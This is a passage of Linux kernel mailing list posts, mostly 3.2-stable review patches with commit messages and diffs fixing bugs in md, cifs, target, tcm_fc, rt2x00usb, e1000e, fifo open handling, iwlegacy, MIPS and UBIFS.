 
 /*
- * Leap second processing. If in leap-insert state at the end of the
- * day, the system clock is set back one second; if in leap-delete
- * state, the system clock is set ahead one second.
+ * this routine handles the overflow of the microsecond field
+ *
+ * The tricky bits of code to handle the accurate clock support
+ * were provided by Dave Mills (mi...@udel.edu) of NTP fame.
+ * They were originally developed for SUN and DEC kernels.
+ * All the kudos should go to Dave for this stuff.
+ *
+ * Also handles leap second processing, and returns leap offset
  */
-static enum hrtimer_restart ntp_leap_second(struct hrtimer *timer)
+int second_overflow(unsigned long secs)
 {
-	enum hrtimer_restart res = HRTIMER_NORESTART;
-
-	write_seqlock(&xtime_lock);
+	int leap = 0;
+	s64 delta;
 
+	/*
+	 * Leap second processing. If in leap-insert state at the end of the
+	 * day, the system c

[ 064/108] md: avoid crash when stopping md array races with closing other open fds.

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: NeilBrown 

commit a05b7ea03d72f36edb0cec05e8893803335c61a0 upstream.

md will refuse to stop an array if any other fd (or mounted fs) is
using it.
When any fs is unmounted or when the last open fd is closed all
pending IO will be flushed (e.g. sync_blockdev call in __blkdev_put)
so there will be no pending IO to worry about when the array is
stopped.

However in order to send the STOP_ARRAY ioctl to stop the array one
must first get an open fd on the block device.
If some fd is being used to write to the block device and it is closed
after mdadm opens the block device, but before mdadm issues the
STOP_ARRAY ioctl, then there will be no last-close on the md device so
__blkdev_put will not call sync_blockdev.

If this happens, then IO can still be in-flight while md tears down
the array and bad things can happen (use-after-free and subsequent
havoc).

So in the case where do_md_stop is being called from an open file
descriptor, call sync_blockdev after taking the mutex to ensure there
will be no new openers.

This is needed when setting a read-write device to read-only too.
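
The check-then-flush order described above can be sketched as follows. This is an assumption-laden model rather than the md code: `toy_bdev` and `toy_md_stop` are hypothetical, the open mutex is left out, and setting a flag stands in for sync_blockdev().

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy block device handle; 'synced' records that a flush was issued. */
struct toy_bdev { bool synced; };

/*
 * Models the start of the stop path. 'bdev' is non-NULL only when the
 * caller reached us through its own open file descriptor (the ioctl path).
 */
static int toy_md_stop(int openers, struct toy_bdev *bdev)
{
	/* !!bdev is 1 if the caller itself accounts for one opener, else 0 */
	if (openers > !!bdev)
		return -EBUSY;
	if (bdev)
		bdev->synced = true;	/* stands in for sync_blockdev(bdev) */
	return 0;
}

/* ioctl path: the caller is the only opener, so the stop proceeds and flushes. */
static bool toy_ioctl_stop_flushes(void)
{
	struct toy_bdev bdev = { false };

	return toy_md_stop(1, &bdev) == 0 && bdev.synced;
}
```

Passing the block device instead of a plain flag lets one argument answer both questions: whether the caller counts as an opener, and which device has to be flushed.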

Reported-by: majianpeng 
Signed-off-by: NeilBrown 
Signed-off-by: Ben Hutchings 
---
 drivers/md/md.c |   36 +++++++++++++++++++++++-------------
 1 file changed, 23 insertions(+), 13 deletions(-)

diff --git a/drivers/md/md.c b/drivers/md/md.c
index 0c1fe4cb..d5ab449 100644
--- a/drivers/md/md.c
+++ b/drivers/md/md.c
@@ -3927,8 +3927,8 @@ array_state_show(struct mddev *mddev, char *page)
 	return sprintf(page, "%s\n", array_states[st]);
 }
 
-static int do_md_stop(struct mddev * mddev, int ro, int is_open);
-static int md_set_readonly(struct mddev * mddev, int is_open);
+static int do_md_stop(struct mddev * mddev, int ro, struct block_device *bdev);
+static int md_set_readonly(struct mddev * mddev, struct block_device *bdev);
 static int do_md_run(struct mddev * mddev);
 static int restart_array(struct mddev *mddev);
 
@@ -3944,14 +3944,14 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
 		/* stopping an active array */
 		if (atomic_read(&mddev->openers) > 0)
 			return -EBUSY;
-		err = do_md_stop(mddev, 0, 0);
+		err = do_md_stop(mddev, 0, NULL);
 		break;
 	case inactive:
 		/* stopping an active array */
 		if (mddev->pers) {
 			if (atomic_read(&mddev->openers) > 0)
 				return -EBUSY;
-			err = do_md_stop(mddev, 2, 0);
+			err = do_md_stop(mddev, 2, NULL);
 		} else
 			err = 0; /* already inactive */
 		break;
@@ -3959,7 +3959,7 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
 		break; /* not supported yet */
 	case readonly:
 		if (mddev->pers)
-			err = md_set_readonly(mddev, 0);
+			err = md_set_readonly(mddev, NULL);
 		else {
 			mddev->ro = 1;
 			set_disk_ro(mddev->gendisk, 1);
@@ -3969,7 +3969,7 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len)
 	case read_auto:
 		if (mddev->pers) {
 			if (mddev->ro == 0)
-				err = md_set_readonly(mddev, 0);
+				err = md_set_readonly(mddev, NULL);
 			else if (mddev->ro == 1)
 				err = restart_array(mddev);
 			if (err == 0) {
@@ -5352,15 +5352,17 @@ void md_stop(struct mddev *mddev)
 }
 EXPORT_SYMBOL_GPL(md_stop);
 
-static int md_set_readonly(struct mddev *mddev, int is_open)
+static int md_set_readonly(struct mddev *mddev, struct block_device *bdev)
 {
 	int err = 0;
 	mutex_lock(&mddev->open_mutex);
-	if (atomic_read(&mddev->openers) > is_open) {
+	if (atomic_read(&mddev->openers) > !!bdev) {
 		printk("md: %s still in use.\n",mdname(mddev));
 		err = -EBUSY;
 		goto out;
 	}
+	if (bdev)
+		sync_blockdev(bdev);
 	if (mddev->pers) {
 		__md_stop_writes(mddev);
 
@@ -5382,18 +5384,26 @@ out:
  *   0 - completely stop and dis-assemble array
  *   2 - stop but do not disassemble array
  */
-static int do_md_stop(struct mddev * mddev, int mode, int is_open)
+static int do_md_stop(struct mddev * mddev, int mode,
+		      struct block_device *bdev)
 {
 	struct gendisk *disk = mddev->gendisk;
 	struct md_rdev *rdev;
 
 	mutex_lock(&mddev->open_mutex);
-	if (atomic_read(&mddev->openers) > is_open ||
+	if (atomic_read(&mddev->openers) > !!bdev ||
 	    mddev->sysfs_active) {
 		printk("md: %s still in use.\n",mdname(mddev));

[ 061/108] cifs: on CONFIG_HIGHMEM machines, limit the rsize/wsize to the kmap space

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jeff Layton 

commit 3ae629d98bd5ed77585a878566f04f310adbc591 upstream.

We currently rely on being able to kmap all of the pages in an async
read or write request. If you're on a machine that has CONFIG_HIGHMEM
set then that kmap space is limited, sometimes to as low as 512 slots.

With 512 slots, we can only support up to a 2M r/wsize, and that's
assuming that we can get our greedy little hands on all of them. There
are other users however, so it's possible we'll end up stuck with a
size that large.

Since we can't handle a rsize or wsize larger than that currently, cap
those options at the number of kmap slots we have. We could consider
capping it even lower, but we currently default to a max of 1M. Might as
well allow those luddites on 32 bit arches enough rope to hang
themselves.

A more robust fix would be to teach the send and receive routines how
to contend with an array of pages so we don't need to marshal up a kvec
array at all. That's a fairly significant overhaul though, so we'll need
this limit in place until that's ready.
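
The arithmetic behind the cap can be checked with a short sketch. The 4 KiB page size, the `toy_*` helper names and the 16 MiB hard maximum used in the checks are assumptions made for illustration; the kernel uses LAST_PKMAP, PAGE_CACHE_SIZE and CIFS_MAX_WSIZE/CIFS_MAX_RSIZE instead.

```c
/* Assumption for this sketch: 4 KiB pages. */
#define TOY_PAGE_SIZE 4096u

/* Largest request that can be kmapped at once, given the number of slots. */
static unsigned int toy_kmap_limit(unsigned int kmap_slots)
{
	return kmap_slots * TOY_PAGE_SIZE;
}

static unsigned int toy_min(unsigned int a, unsigned int b)
{
	return a < b ? a : b;
}

/* Cap a requested rsize/wsize by the kmap limit first, then by a hard maximum. */
static unsigned int toy_cap_io_size(unsigned int requested,
				    unsigned int kmap_slots,
				    unsigned int hard_max)
{
	unsigned int size = toy_min(requested, toy_kmap_limit(kmap_slots));

	return toy_min(size, hard_max);
}
```

With 512 slots the limit works out to 2 MiB, so a 4 MiB request is clamped to 2 MiB while the 1 MiB default passes through unchanged.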

Reported-by: Jian Li 
Signed-off-by: Jeff Layton 
Signed-off-by: Steve French 
Signed-off-by: Ben Hutchings 
---
 fs/cifs/connect.c |   18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
index 0ae86dd..94b7788 100644
--- a/fs/cifs/connect.c
+++ b/fs/cifs/connect.c
@@ -3445,6 +3445,18 @@ void cifs_setup_cifs_sb(struct smb_vol *pvolume_info,
 #define CIFS_DEFAULT_NON_POSIX_RSIZE (60 * 1024)
 #define CIFS_DEFAULT_NON_POSIX_WSIZE (65536)
 
+/*
+ * On hosts with high memory, we can't currently support wsize/rsize that are
+ * larger than we can kmap at once. Cap the rsize/wsize at
+ * LAST_PKMAP * PAGE_SIZE. We'll never be able to fill a read or write request
+ * larger than that anyway.
+ */
+#ifdef CONFIG_HIGHMEM
+#define CIFS_KMAP_SIZE_LIMIT   (LAST_PKMAP * PAGE_CACHE_SIZE)
+#else /* CONFIG_HIGHMEM */
+#define CIFS_KMAP_SIZE_LIMIT   (1<<24)
+#endif /* CONFIG_HIGHMEM */
+
 static unsigned int
 cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb_vol *pvolume_info)
 {
@@ -3475,6 +3487,9 @@ cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb_vol *pvolume_info)
 		wsize = min_t(unsigned int, wsize,
 				server->maxBuf - sizeof(WRITE_REQ) + 4);
 
+	/* limit to the amount that we can kmap at once */
+	wsize = min_t(unsigned int, wsize, CIFS_KMAP_SIZE_LIMIT);
+
 	/* hard limit of CIFS_MAX_WSIZE */
 	wsize = min_t(unsigned int, wsize, CIFS_MAX_WSIZE);
 
@@ -3516,6 +3531,9 @@ cifs_negotiate_rsize(struct cifs_tcon *tcon, struct smb_vol *pvolume_info)
 	if (!(server->capabilities & CAP_LARGE_READ_X))
 		rsize = min_t(unsigned int, CIFSMaxBufSize, rsize);
 
+	/* limit to the amount that we can kmap at once */
+	rsize = min_t(unsigned int, rsize, CIFS_KMAP_SIZE_LIMIT);
+
 	/* hard limit of CIFS_MAX_RSIZE */
 	rsize = min_t(unsigned int, rsize, CIFS_MAX_RSIZE);
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[PATCH] Enable devtmpfs by default

2012-07-22 Thread Anton Blanchard

udev now requires CONFIG_DEVTMPFS so make it default to y.

I noticed this when booting a ppc64 pseries_defconfig on Fedora 17
and it panicked because it couldn't mount the root device.

Signed-off-by: Anton Blanchard 
---

Index: b/drivers/base/Kconfig
===
--- a/drivers/base/Kconfig
+++ b/drivers/base/Kconfig
@@ -24,6 +24,7 @@ config UEVENT_HELPER_PATH
 config DEVTMPFS
bool "Maintain a devtmpfs filesystem to mount at /dev"
depends on HOTPLUG
+   default y
help
  This creates a tmpfs/ramfs filesystem instance early at bootup.
  In this filesystem, the kernel driver core maintains device


[ 060/108] target: Fix range calculation in WRITE SAME emulation when num blocks == 0

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Roland Dreier 

commit 1765fe5edcb83f53fc67edeb559fcf4bc82c6460 upstream.

When NUMBER OF LOGICAL BLOCKS is 0, WRITE SAME is supposed to write
all the blocks from the specified LBA through the end of the device.
However, dev->transport->get_blocks(dev) (perhaps confusingly) returns
the last valid LBA rather than the number of blocks, so the correct
number of blocks to write starting with lba is

dev->transport->get_blocks(dev) - lba + 1
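
The off-by-one can be checked with a small standalone sketch. The function
name and parameters below are hypothetical; last_lba stands in for the
value that get_blocks() returns according to the description above.

```c
#include <assert.h>
#include <stdint.h>

/*
 * last_lba is the last valid LBA (not the number of blocks), so the
 * count of blocks from lba through the end of the device is
 * last_lba - lba + 1.
 */
static uint64_t example_write_same_range(uint64_t last_lba, uint64_t lba,
					 uint64_t num_blocks)
{
	assert(lba <= last_lba);
	if (num_blocks != 0)
		return num_blocks;
	return last_lba - lba + 1;
}
```

For a 100-block device (last valid LBA 99), starting at LBA 90 with
num_blocks == 0 gives a range of 10 blocks, not 9.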

(nab: Backport roland's for-3.6 patch to for-3.5)

Signed-off-by: Roland Dreier 
Signed-off-by: Nicholas Bellinger 
Signed-off-by: Ben Hutchings 
---
 drivers/target/target_core_cdb.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/target/target_core_cdb.c b/drivers/target/target_core_cdb.c
index 9888693..664f6e7 100644
--- a/drivers/target/target_core_cdb.c
+++ b/drivers/target/target_core_cdb.c
@@ -1095,7 +1095,7 @@ int target_emulate_write_same(struct se_cmd *cmd)
if (num_blocks != 0)
range = num_blocks;
else
-   range = (dev->transport->get_blocks(dev) - lba);
+   range = (dev->transport->get_blocks(dev) - lba) + 1;
 
pr_debug("WRITE_SAME UNMAP: LBA: %llu Range: %llu\n",
 (unsigned long long)lba, (unsigned long long)range);




[ 057/108] tcm_fc: Fix crash seen with aborts and large reads

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mark Rustad 

commit 3cc5d2a6b9a2fd1bf024aa5e52dd22961eecaf13 upstream.

This patch fixes a crash seen when large reads have their exchange
aborted by either timing out or being reset. Because the exchange
abort results in the seq pointer being set to NULL, because the
sequence is no longer valid, it must not be dereferenced. This
patch changes the function ft_get_task_tag to return ~0 if it is
unable to get the tag for this reason. Because the get_task_tag
interface provides no means of returning an error, this seems
like the best way to fix this issue at the moment.
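
A minimal sketch of the sentinel approach, using simplified hypothetical
structures rather than the driver's real ones:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified stand-ins for the driver's structures. */
struct example_seq {
	uint32_t rxid;
};

struct example_cmd {
	struct example_seq *seq;	/* NULL once the exchange is aborted */
	int aborted;
};

#define EXAMPLE_INVALID_TAG (~(uint32_t)0)

/* Return the tag, or an all-ones sentinel when seq must not be used. */
static uint32_t example_get_task_tag(const struct example_cmd *cmd)
{
	assert(cmd != NULL);
	if (cmd->aborted)
		return EXAMPLE_INVALID_TAG;
	return cmd->seq->rxid;
}
```

The caller has to treat the all-ones value as "no tag available", since the
interface has no separate error channel.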

Signed-off-by: Mark Rustad 
Signed-off-by: Nicholas Bellinger 
Signed-off-by: Ben Hutchings 
---
 drivers/target/tcm_fc/tfc_cmd.c |2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/target/tcm_fc/tfc_cmd.c b/drivers/target/tcm_fc/tfc_cmd.c
index f03fb97..5b65f33 100644
--- a/drivers/target/tcm_fc/tfc_cmd.c
+++ b/drivers/target/tcm_fc/tfc_cmd.c
@@ -230,6 +230,8 @@ u32 ft_get_task_tag(struct se_cmd *se_cmd)
 {
struct ft_cmd *cmd = container_of(se_cmd, struct ft_cmd, se_cmd);
 
+   if (cmd->aborted)
+   return ~0;
return fc_seq_exch(cmd->seq)->rxid;
 }
 




[ 053/108] rt2x00usb: fix indexes ordering on RX queue kick

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Stanislaw Gruszka 

commit efd821182cec8c92babef6e00a95066d3252fda4 upstream.

On rt2x00_dmastart() we increase index specified by Q_INDEX and on
rt2x00_dmadone() we increase index specified by Q_INDEX_DONE. So entries
between Q_INDEX_DONE and Q_INDEX are those we currently process in the
hardware. Entries between Q_INDEX and Q_INDEX_DONE are those we can
submit to the hardware.
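
To make the two ranges concrete, here is a small sketch of circular index
arithmetic. The helper name and the queue size are hypothetical and not
taken from the driver.

```c
#include <assert.h>

/*
 * Number of entries in the circular half-open range [start, end) of a
 * ring with 'limit' slots. Equal indexes yield 0 here; telling an empty
 * ring from a full one needs a separate count, which this sketch omits.
 */
static unsigned int example_ring_span(unsigned int start, unsigned int end,
				      unsigned int limit)
{
	assert(limit > 0 && start < limit && end < limit);
	return (end + limit - start) % limit;
}
```

With 8 slots, Q_INDEX at 5 and Q_INDEX_DONE at 2, the span from
Q_INDEX_DONE to Q_INDEX covers 3 entries (in the hardware), and the span
from Q_INDEX to Q_INDEX_DONE covers the other 5 (available to submit).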

Fix rt2x00usb_kick_queue() accordingly, as we need to submit RX entries
that are not being processed by the hardware. It previously worked only
for an empty queue and was broken otherwise.

Note that for TX queues the index ordering is fine. We need to kick entries
that have a filled skb but were not submitted to the hardware, i.e.
those starting from Q_INDEX_DONE that have the ENTRY_DATA_PENDING bit set.

From a practical standpoint, this fixes an RX queue stall, usually reproducible
in AP mode, as reported for example here:
https://bugzilla.redhat.com/show_bug.cgi?id=828824

Reported-and-tested-by: Franco Miceli 
Reported-and-tested-by: Tom Horsley 
Signed-off-by: Stanislaw Gruszka 
Signed-off-by: John W. Linville 
Signed-off-by: Ben Hutchings 
---
 drivers/net/wireless/rt2x00/rt2x00usb.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/wireless/rt2x00/rt2x00usb.c b/drivers/net/wireless/rt2x00/rt2x00usb.c
index d357d1e..74ecc33 100644
--- a/drivers/net/wireless/rt2x00/rt2x00usb.c
+++ b/drivers/net/wireless/rt2x00/rt2x00usb.c
@@ -436,8 +436,8 @@ void rt2x00usb_kick_queue(struct data_queue *queue)
case QID_RX:
if (!rt2x00queue_full(queue))
rt2x00queue_for_each_entry(queue,
-  Q_INDEX_DONE,
   Q_INDEX,
+  Q_INDEX_DONE,
   NULL,
   rt2x00usb_kick_rx_entry);
break;




[ 056/108] e1000e: Correct link check logic for 82571 serdes

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Tushar Dave 

commit d0efa8f23a644f7cb7d1f8e78dd9a223efa412a3 upstream.

SYNCH bit and IV bit of RXCW register are sticky. Before examining these bits,
RXCW should be read twice to filter out one-time false events and have correct
values for these bits. Incorrect values of these bits in link check logic can
cause weird link stability issues if auto-negotiation fails.
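
The double read can be pictured with a toy register model. Everything
below is an assumption made for illustration: the struct, the bit values,
and in particular the idea that latched bits are cleared by a read. It is
not a description of the actual hardware.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative bit positions, assumed for this sketch only. */
#define EXAMPLE_RXCW_IV    0x08000000u
#define EXAMPLE_RXCW_SYNCH 0x40000000u

/* Toy model: 'latched' holds stale sticky events, 'live' current state. */
struct example_reg {
	uint32_t latched;
	uint32_t live;
};

/* A read returns stale and current bits, then drops the stale ones. */
static uint32_t example_read(struct example_reg *r)
{
	uint32_t v;

	assert(r != NULL);
	v = r->latched | r->live;
	r->latched = 0;	/* assumption: sticky bits clear on read */
	return v;
}

/* Discard the first read so that only current state is examined. */
static uint32_t example_read_twice(struct example_reg *r)
{
	(void)example_read(r);
	return example_read(r);
}
```

In this model a stale invalid-symbol event shows up in the first read but
not in the second, which is the value the link check should use.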

Reported-by: Dean Nelson 
Signed-off-by: Tushar Dave 
Reviewed-by: Bruce Allan 
Tested-by: Jeff Pieper 
Signed-off-by: Jeff Kirsher 
Signed-off-by: Ben Hutchings 
---
 drivers/net/ethernet/intel/e1000e/82571.c |3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/ethernet/intel/e1000e/82571.c b/drivers/net/ethernet/intel/e1000e/82571.c
index 36db4df..1f063dc 100644
--- a/drivers/net/ethernet/intel/e1000e/82571.c
+++ b/drivers/net/ethernet/intel/e1000e/82571.c
@@ -1572,6 +1572,9 @@ static s32 e1000_check_for_serdes_link_82571(struct e1000_hw *hw)
ctrl = er32(CTRL);
status = er32(STATUS);
rxcw = er32(RXCW);
+   /* SYNCH bit and IV bit are sticky */
+   udelay(10);
+   rxcw = er32(RXCW);
 
if ((rxcw & E1000_RXCW_SYNCH) && !(rxcw & E1000_RXCW_IV)) {
 




[ 058/108] fifo: Do not restart open() if it already found a partner

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Anders Kaseorg 

commit 05d290d66be6ef77a0b962ebecf01911bd984a78 upstream.

If a parent and child process open the two ends of a fifo, and the
child immediately exits, the parent may receive a SIGCHLD before its
open() returns.  In that case, we need to make sure that open() will
return successfully after the SIGCHLD handler returns, instead of
throwing EINTR or being restarted.  Otherwise, the restarted open()
would incorrectly wait for a second partner on the other end.

The following test demonstrates the EINTR that was wrongly thrown from
the parent’s open().  Change .sa_flags = 0 to .sa_flags = SA_RESTART
to see a deadlock instead, in which the restarted open() waits for a
second reader that will never come.  (On my systems, this happens
pretty reliably within about 5 to 500 iterations.  Others report that
it manages to loop ~forever sometimes; YMMV.)

  #include <sys/types.h>
  #include <sys/stat.h>
  #include <sys/wait.h>
  #include <fcntl.h>
  #include <signal.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>

  #define CHECK(x) do if ((x) == -1) {perror(#x); abort();} while(0)

  void handler(int signum) {}

  int main()
  {
  struct sigaction act = {.sa_handler = handler, .sa_flags = 0};
  CHECK(sigaction(SIGCHLD, &act, NULL));
  CHECK(mknod("fifo", S_IFIFO | S_IRWXU, 0));
  for (;;) {
  int fd;
  pid_t pid;
  putc('.', stderr);
  CHECK(pid = fork());
  if (pid == 0) {
  CHECK(fd = open("fifo", O_RDONLY));
  _exit(0);
  }
  CHECK(fd = open("fifo", O_WRONLY));
  CHECK(close(fd));
  CHECK(waitpid(pid, NULL, 0));
  }
  }

This is what I suspect was causing the Git test suite to fail in
t9010-svn-fe.sh:

http://bugs.debian.org/678852

Signed-off-by: Anders Kaseorg 
Reviewed-by: Jonathan Nieder 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/fifo.c |9 -
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/fs/fifo.c b/fs/fifo.c
index b1a524d..cf6f434 100644
--- a/fs/fifo.c
+++ b/fs/fifo.c
@@ -14,7 +14,7 @@
 #include 
 #include 
 
-static void wait_for_partner(struct inode* inode, unsigned int *cnt)
+static int wait_for_partner(struct inode* inode, unsigned int *cnt)
 {
int cur = *cnt; 
 
@@ -23,6 +23,7 @@ static void wait_for_partner(struct inode* inode, unsigned int *cnt)
if (signal_pending(current))
break;
}
+   return cur == *cnt ? -ERESTARTSYS : 0;
 }
 
 static void wake_up_partner(struct inode* inode)
@@ -67,8 +68,7 @@ static int fifo_open(struct inode *inode, struct file *filp)
 * seen a writer */
filp->f_version = pipe->w_counter;
} else {
-   wait_for_partner(inode, &pipe->w_counter);
-   if(signal_pending(current))
+   if (wait_for_partner(inode, &pipe->w_counter))
goto err_rd;
}
}
@@ -90,8 +90,7 @@ static int fifo_open(struct inode *inode, struct file *filp)
wake_up_partner(inode);
 
if (!pipe->readers) {
-   wait_for_partner(inode, &pipe->r_counter);
-   if (signal_pending(current))
+   if (wait_for_partner(inode, &pipe->r_counter))
goto err_wr;
}
break;




[ 054/108] iwlegacy: always monitor for stuck queues

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Stanislaw Gruszka 

commit c2ca7d92ed4bbd779516beb6eb226e19f7f7ab0f upstream.

This is iwlegacy version of:

commit 342bbf3fee2fa9a18147e74b2e3c4229a4564912
Author: Johannes Berg 
Date:   Sun Mar 4 08:50:46 2012 -0800

iwlwifi: always monitor for stuck queues

If we only monitor while associated, the following
can happen:
 - we're associated, and the queue stuck check
   runs, setting the queue "touch" time to X
 - we disassociate, stopping the monitoring,
   which leaves the time set to X
 - almost 2s later, we associate, and enqueue
   a frame
 - before the frame is transmitted, we monitor
   for stuck queues, and find the time set to
   X, although it is now later than X + 2000ms,
   so we decide that the queue is stuck and
   erroneously restart the device
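
The timeline above can be replayed with a simplified model. The struct,
the function and the idea that the check refreshes the timestamp whenever
the queue is idle are assumptions for illustration; only the 2000ms
threshold comes from the description.

```c
#include <assert.h>
#include <stddef.h>

#define EXAMPLE_STUCK_MS 2000ul

/* Hypothetical, simplified TX queue state. */
struct example_txq {
	unsigned long touch_ms;	/* last time the queue was seen idle */
	int pending;		/* frames waiting to be transmitted */
};

/* Returns 1 if the queue looks stuck at time now_ms, 0 otherwise. */
static int example_check_stuck(struct example_txq *q, unsigned long now_ms)
{
	assert(q != NULL);
	if (q->pending == 0) {
		q->touch_ms = now_ms;	/* idle queue: refresh timestamp */
		return 0;
	}
	return now_ms - q->touch_ms > EXAMPLE_STUCK_MS;
}
```

If the check is skipped between t=1000 and t=3500 and a frame is then
queued, a check at t=3501 reports a stuck queue. If the check keeps
running while idle (say at t=3400), the same check at t=3501 does not.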

Signed-off-by: Stanislaw Gruszka 
Signed-off-by: John W. Linville 
[bwh: Backported to 3.2: adjust filename, function and variable names]
Signed-off-by: Ben Hutchings 
---
--- a/drivers/net/wireless/iwlegacy/iwl-core.c
+++ b/drivers/net/wireless/iwlegacy/iwl-core.c
@@ -1884,14 +1884,12 @@ void iwl_legacy_bg_watchdog(unsigned lon
return;
 
/* monitor and check for other stuck queues */
-   if (iwl_legacy_is_any_associated(priv)) {
-   for (cnt = 0; cnt < priv->hw_params.max_txq_num; cnt++) {
-   /* skip as we already checked the command queue */
-   if (cnt == priv->cmd_queue)
-   continue;
-   if (iwl_legacy_check_stuck_queue(priv, cnt))
-   return;
-   }
+   for (cnt = 0; cnt < priv->hw_params.max_txq_num; cnt++) {
+   /* skip as we already checked the command queue */
+   if (cnt == priv->cmd_queue)
+   continue;
+   if (iwl_legacy_check_stuck_queue(priv, cnt))
+   return;
}
 
mod_timer(&priv->watchdog, jiffies +




[ 066/108] MIPS: Properly align the .data..init_task section.

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: David Daney 

commit 7b1c0d26a8e272787f0f9fcc5f3e8531df3b3409 upstream.

Improper alignment can lead to unbootable systems and/or random
crashes.

[r...@linux-mips.org: This is a long-standing bug since
6eb10bc9e2deab06630261cd05c4cb1e9a60e980 (kernel.org) rsp.
c422a10917f75fd19fa7fe07023e384dae6f (lmo) [MIPS: Clean up linker script
using new linker script macros.] so dates back to 2.6.32.]

Signed-off-by: David Daney 
Cc: linux-m...@linux-mips.org
Patchwork: https://patchwork.linux-mips.org/patch/3881/
Signed-off-by: Ralf Baechle 
Signed-off-by: Ben Hutchings 
---
 arch/mips/include/asm/thread_info.h |4 ++--
 arch/mips/kernel/vmlinux.lds.S  |3 ++-
 2 files changed, 4 insertions(+), 3 deletions(-)

--- a/arch/mips/include/asm/thread_info.h
+++ b/arch/mips/include/asm/thread_info.h
@@ -60,6 +60,8 @@ struct thread_info {
 register struct thread_info *__current_thread_info __asm__("$28");
 #define current_thread_info()  __current_thread_info
 
+#endif /* !__ASSEMBLY__ */
+
 /* thread information allocation */
 #if defined(CONFIG_PAGE_SIZE_4KB) && defined(CONFIG_32BIT)
 #define THREAD_SIZE_ORDER (1)
@@ -97,8 +99,6 @@ register struct thread_info *__current_t
 
 #define free_thread_info(info) kfree(info)
 
-#endif /* !__ASSEMBLY__ */
-
 #define PREEMPT_ACTIVE 0x1000
 
 /*
--- a/arch/mips/kernel/vmlinux.lds.S
+++ b/arch/mips/kernel/vmlinux.lds.S
@@ -1,5 +1,6 @@
 #include 
 #include 
+#include 
 #include 
 
 #undef mips
@@ -73,7 +74,7 @@ SECTIONS
.data : {   /* Data */
. = . + DATAOFFSET; /* for CONFIG_MAPPED_KERNEL */
 
-   INIT_TASK_DATA(PAGE_SIZE)
+   INIT_TASK_DATA(THREAD_SIZE)
NOSAVE_DATA
CACHELINE_ALIGNED_DATA(1 << CONFIG_MIPS_L1_CACHE_SHIFT)
READ_MOSTLY_DATA(1 << CONFIG_MIPS_L1_CACHE_SHIFT)




[ 062/108] cifs: always update the inode cache with the results from a FIND_*

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jeff Layton 

commit cd60042cc1392e79410dc8de9e9c1abb38a29e57 upstream.

When we get back a FIND_FIRST/NEXT result, we have some info about the
dentry that we use to instantiate a new inode. We were ignoring and
discarding that info when we had an existing dentry in the cache.

Fix this by updating the inode in place when we find an existing dentry
and the uniqueid is the same.

Reported-and-Tested-by: Andrew Bartlett 
Reported-by: Bill Robertson 
Reported-by: Dion Edwards 
Signed-off-by: Jeff Layton 
Signed-off-by: Steve French 
Signed-off-by: Ben Hutchings 
---
 fs/cifs/readdir.c |7 +--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/fs/cifs/readdir.c b/fs/cifs/readdir.c
index 0a8224d..a4217f0 100644
--- a/fs/cifs/readdir.c
+++ b/fs/cifs/readdir.c
@@ -86,9 +86,12 @@ cifs_readdir_lookup(struct dentry *parent, struct qstr *name,
 
dentry = d_lookup(parent, name);
if (dentry) {
-   /* FIXME: check for inode number changes? */
-   if (dentry->d_inode != NULL)
+   inode = dentry->d_inode;
+   /* update inode in place if i_ino didn't change */
+   if (inode && CIFS_I(inode)->uniqueid == fattr->cf_uniqueid) {
+   cifs_fattr_to_inode(inode, fattr);
return dentry;
+   }
d_drop(dentry);
dput(dentry);
}




[ 067/108] UBIFS: fix a bug in empty space fix-up

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Artem Bityutskiy 

commit c6727932cfdb13501108b16c38463c09d5ec7a74 upstream.

UBIFS has a feature called "empty space fix-up", which is a quirk to work around
limitations of dumb flasher programs, namely those flashers that are unable
to skip NAND pages full of 0xFFs while flashing, which leaves the empty space at
the end of half-filled eraseblocks unusable for UBIFS. This feature is
relatively new (introduced in v3.0).

The fix-up routine (fixup_free_space()) is executed only once at the very first
mount if the superblock has the 'space_fixup' flag set (can be done with -F
option of mkfs.ubifs). It basically reads all the UBIFS data and metadata and
writes it back to the same LEB. The routine assumes the image is pristine and
does not have anything in the journal.

There was a bug in 'fixup_free_space()' where it fixed up the log incorrectly.
All but one LEB of the log of a pristine file-system are empty. And one
